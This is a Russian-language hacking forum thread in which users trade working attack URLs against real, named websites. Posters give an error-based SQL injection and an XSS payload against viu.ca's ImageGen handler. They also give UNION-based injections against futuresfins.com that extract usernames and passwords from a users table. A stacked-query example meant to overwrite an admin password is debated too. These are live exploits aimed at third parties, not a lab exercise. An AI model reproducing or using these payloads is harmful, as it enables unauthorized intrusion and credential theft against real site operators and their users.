12.12.2013, 18:03
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от mgVolt
Всем привет.
Не подскажете, как эксплуатируется XSS в параметре font в Imagegen, CVE-2013-0741 (http://secunia.com/community/advisories/52771).
Например, здесь http://www.viu.ca/ImageGen.ashx?image=/homestay/galleria_photos/013.JPG&width=960
Там есть нечто большее:
Код:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
|
|
|
12.12.2013, 18:20
|
|
Новичок
Регистрация: 22.08.2007
Сообщений: 2
С нами:
9852548
Репутация:
0
|
|
Сообщение от Inoms
Там есть нечто большее:
Код:
http://www.viu.ca/events/event.aspx?id=9275%20or%28select%281%29from%28information_schema.schemata%29where%281=1%29group%20by%28concat%28version%28%29,0x3b,user%28%29,floor%28rand%280%29*2%29%29%20%29having%28min%280%29%29%29
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
|
|
|
|
12.12.2013, 18:27
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от mgVolt
Круто, но мне сам сайт не нужен, просто взял первый попавшийся, где используется imagegen
Код:
http://www.viu.ca/ImageGen.ashx?font=%3Cscript%3Ealert%28/Test/%29%3C/script%3E
|
|
|
|
12.12.2013, 18:29
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от qaz
никак не изменишь, нельзя в запросе использовать несколько разных операторов
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой ;.
Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]victim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]'+union+select+1,2,3...; UPDATE '[/COLOR][COLOR="#0000BB"]admin_login[/COLOR][COLOR="#DD0000"]' SET '[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#0000BB"]pas1[/COLOR][COLOR="#DD0000"]' WHERE login_name='[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#DD0000"]'
[/COLOR][/COLOR]
В случае с Mysql это не прокатит.
|
|
|
|
12.12.2013, 18:34
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Это ещё зависит от используемого ЯП и функции выполнения запросов. В стандартной mysql_query из php множественные запросы запрещены))
|
|
|
|
12.12.2013, 20:42
|
|
Новичок
Регистрация: 03.01.2012
Сообщений: 8
С нами:
7556726
Репутация:
0
|
|
Уважаемые, помогите вывести хоть что нибудь.
Сообщение от None
http://www.futuresfins.com/fin-detail.php?id=1+union+select+group_concat(0x757365 726e616d65,0x3b,0x70617373776f7264),2,3,4,5,6,7,8, 9,10,11+from+information_schema.columns+where+tabl e_name=0x7573657273+limit+1
|
|
|
|
12.12.2013, 20:47
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от MrKloud
Уважаемые, помогите вывести хоть что нибудь.
/thread43966.html
Сообщение от None
www.futuresfins.com/fin-detail.php?id=1+union+select+1,(select(@x)from(sel ect (@x:=0x00),(select(0)from(Future_future2.users)whe re(0x00)in(@x:=concat(@x,0x3c62723e,username,0x3a, password))))x),3,4,5,6,7,8, 9,10,11+--+
|
|
|
|
12.12.2013, 22:09
|
|
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами:
7864886
Репутация:
-5
|
|
Сообщение от YaBtr
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой
;
.
Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]victim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]'+union+select+1,2,3...; UPDATE '[/COLOR][COLOR="#0000BB"]admin_login[/COLOR][COLOR="#DD0000"]' SET '[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#0000BB"]pas1[/COLOR][COLOR="#DD0000"]' WHERE login_name='[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#DD0000"]'
[/COLOR][/COLOR]
В случае с Mysql это не прокатит. вот так?
http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
|
|
|
|
12.12.2013, 22:13
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Hapk
вот так?
http://site.ru/index.php?id=123'+UNION%0d%0aSELECT+1,2,3,admin,5, 6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE usrname='admin'+--+
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
|
|
|
|
12.12.2013, 22:16
|
|
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами:
7864886
Репутация:
-5
|
|
Сообщение от qaz
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
Бля не так просто понял!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
